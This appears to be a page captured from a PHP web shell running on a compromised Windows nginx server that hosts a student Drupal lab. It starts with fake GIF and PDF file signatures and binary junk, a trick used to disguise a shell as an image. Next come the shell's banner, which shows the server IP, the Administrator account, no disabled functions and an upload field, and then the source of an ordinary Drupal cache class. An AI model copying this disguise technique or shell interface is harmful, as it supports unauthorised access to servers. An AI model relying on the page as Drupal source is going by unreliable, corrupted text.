GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Cache/ |
Upload File : |
<?php namespace Drupal\Core\Cache; use Symfony\Component\DependencyInjection\ContainerBuilder; use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface; /** * Adds cache_bins parameter to the container. */ class ListCacheBinsPass implements CompilerPassInterface { /** * Implements CompilerPassInterface::process(). * * Collects the cache bins into the cache_bins parameter. */ public function process(ContainerBuilder $container) { $cache_bins = []; $cache_default_bin_backends = []; foreach ($container->findTaggedServiceIds('cache.bin') as $id => $attributes) { $bin = substr($id, strpos($id, '.') + 1); $cache_bins[$id] = $bin; if (isset($attributes[0]['default_backend'])) { $cache_default_bin_backends[$bin] = $attributes[0]['default_backend']; } } $container->setParameter('cache_bins', $cache_bins); $container->setParameter('cache_default_bin_backends', $cache_default_bin_backends); } }